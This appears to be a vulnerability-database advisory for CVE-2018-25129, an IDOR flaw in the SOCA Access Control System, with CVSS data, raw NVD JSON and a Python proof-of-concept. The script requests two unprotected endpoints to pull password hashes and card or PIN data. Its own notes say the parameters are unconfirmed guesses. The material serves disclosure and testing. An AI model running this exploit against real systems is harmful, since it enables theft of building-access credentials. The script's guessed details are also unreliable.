Security Vulnerability Report
CVE-2018-25129 CVSS 7.5 HIGH

CVE-2018-25129

Published: 2025-12-24 20:15:47
Last Modified: 2026-04-15 00:35:42

Description

SOCA Access Control System 180612 contains multiple insecure direct object reference vulnerabilities that allow attackers to access sensitive user credentials. Attackers can retrieve authenticated and unauthenticated user password hashes and pins through unprotected endpoints like Get_Permissions_From_DB.php and Ac10_ReadSortCard.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SOCA Access Control System 180612

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
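# CVE-2018-25129 PoC - SOCA Access Control System IDOR
# Checks whether the two endpoints named in the advisory return credential
# material to a request that carries no session cookie or token.
#
# NOTE(review): the query parameters (user_id, card_id), the use of GET and the
# "32 or more hex characters" hash heuristic are not stated in the advisory
# text; confirm them against ZSL-2019-5517 / EDB-46832 before trusting a
# positive or a negative result.
# NOTE(review): the CVE record scores this PR:N under CVSS 3.1 and PR:L under
# CVSS 4.0, so whether a low-privilege session is required is not settled here.
#
# Defender view (CWE-639): the fix is a server-side authorization check on each
# of these endpoints; requests to either path that carry no session are the
# log pattern worth alerting on.
import re
import sys

import requests

# Placeholder under the reserved ".example" TLD (RFC 2606), so an unedited run
# cannot send traffic to a real third-party host.
target_url = "http://soca-device.example/"


def _redact(value, keep=4):
    """Return a short prefix of *value* plus its length, never the full secret."""
    return f"{value[:keep]}... ({len(value)} chars)"


def exploit_get_permissions():
    """Request Get_Permissions_From_DB.php and look for a hash-like string.

    Returns:
        The first run of 32 or more hex characters found in a 200 response,
        or None when the request fails, the status is not 200, or nothing
        matches.
    """
    endpoint = f"{target_url}Get_Permissions_From_DB.php"
    # IDOR: the object identifier is taken from the request as-is.
    params = {"user_id": "1"}
    try:
        response = requests.get(endpoint, params=params, timeout=10)
    except requests.RequestException as e:
        # Only transport-level failures are expected here; anything else is a
        # bug in this script and should surface instead of being swallowed.
        print(f"Error: {e}", file=sys.stderr)
        return None
    if response.status_code != 200:
        return None
    # Heuristic only: any long hex run (asset fingerprint, session token)
    # matches too, so a hit needs manual confirmation.
    hash_match = re.search(r'[a-fA-F0-9]{32,}', response.text)
    return hash_match.group(0) if hash_match else None


def exploit_read_sort_card():
    """Request Ac10_ReadSortCard and return the body of a 200 response.

    Returns:
        The response text on HTTP 200, otherwise None. The body is not
        inspected, so an error or login page served with status 200 is
        returned as well.
    """
    endpoint = f"{target_url}Ac10_ReadSortCard"
    # IDOR: direct access to card data without authorization
    params = {"card_id": "1"}
    try:
        response = requests.get(endpoint, params=params, timeout=10)
    except requests.RequestException as e:
        print(f"Error: {e}", file=sys.stderr)
        return None
    return response.text if response.status_code == 200 else None


if __name__ == "__main__":
    print("[*] CVE-2018-25129 PoC - SOCA Access Control System IDOR")
    print("[*] Target:", target_url)

    print("\n[1] Attempting to retrieve password hash...")
    password_hash = exploit_get_permissions()
    if password_hash:
        # Redacted so the credential does not end up in scrollback or CI logs.
        print(f"[!] Found password hash: {_redact(password_hash)}")

    print("\n[2] Attempting to retrieve card/PIN data...")
    card_data = exploit_read_sort_card()
    if card_data:
        # Any non-empty 200 body reaches this line; inspect the response by
        # hand before reporting the endpoint as exposed.
        print(f"[!] Found card data: {_redact(card_data)}")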

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25129", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:46.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOCA Access Control System 180612 contains multiple insecure direct object reference vulnerabilities that allow attackers to access sensitive user credentials. Attackers can retrieve authenticated and unauthenticated user password hashes and pins through unprotected endpoints like Get_Permissions_From_DB.php and Ac10_ReadSortCard."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "http://www.socatech.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46832", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}